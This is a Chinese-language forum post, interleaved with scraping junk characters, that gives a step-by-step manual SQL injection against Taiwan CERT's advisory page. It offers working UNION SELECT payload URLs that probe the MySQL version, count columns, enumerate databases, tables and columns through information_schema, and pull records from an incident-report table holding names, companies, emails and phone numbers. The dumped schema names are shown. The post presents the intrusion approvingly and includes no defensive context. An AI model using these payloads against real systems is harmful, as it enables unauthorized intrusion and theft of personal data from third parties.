1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
; `6 P; h3 v8 b8 }+ q' N. _* `2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
2 \3 a, I: S+ A: `; j* |4 N" Y( Xhttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
2 f+ M& t2 A2 {$ N3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
; f8 N# f( X, @& ~3 M) s7 m数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。- e9 ~* ~# l0 y9 p0 ^( K
4.判断有没有写权限! w1 h; A1 B( U: E% V: l
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限4 T6 ^0 l- C* p$ P, p
没办法,手动猜表啦$ H5 O% ]' d: B7 S" ^4 k$ S% _
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1! ^/ X) E* h" f' @
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下3 a# k0 T; O2 Y/ l5 ~( {
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--7 ^0 u% A9 c- Q% H! x1 I7 A+ A
成功查出所有数据库,国外的黑客就是不一般。数据库如下:
% i5 n# \- P9 }1 Uinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
! ~; R' _: W' p6.爆表,爆的是twcert库& D2 A9 O9 X, e- U( E
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
$ e% m3 ]* u* Y' y5 L: E爆出如下表
' X e1 k" U$ q; _9 Q3 }. \7 |downloadfile,irsys,newsdata,secrpt,secrpt_big5
- O Q9 \/ P) f1 _7.爆列名,这次爆的是irsys表
. r2 k8 G; g Q1 d3 W$ f& m4 Ihttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--5 Y9 {! Q$ R- P7 p. _
爆出如下列
- V7 B; k1 s( l7 b( vir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
8 l( b0 ]3 x. @9 O9 ]- j3 F& }* I8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。$ f, a; a5 d5 h) k. C7 R! [/ R
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
+ _1 v$ {+ l6 Y0 X( e返回是3,说明每个列里有3个地段, \# w" O+ U+ _6 _1 r. _9 ~" {* w
9.爆字段内容! Z- G5 b: y! J. j1 u, W
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
8 t) I5 P, A' C% C8 N/ ^# u' i+ t爆出name列的第一个字段的内容
. \: n& K8 N. K3 g& Q" \http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
6 o3 z; M n' U爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对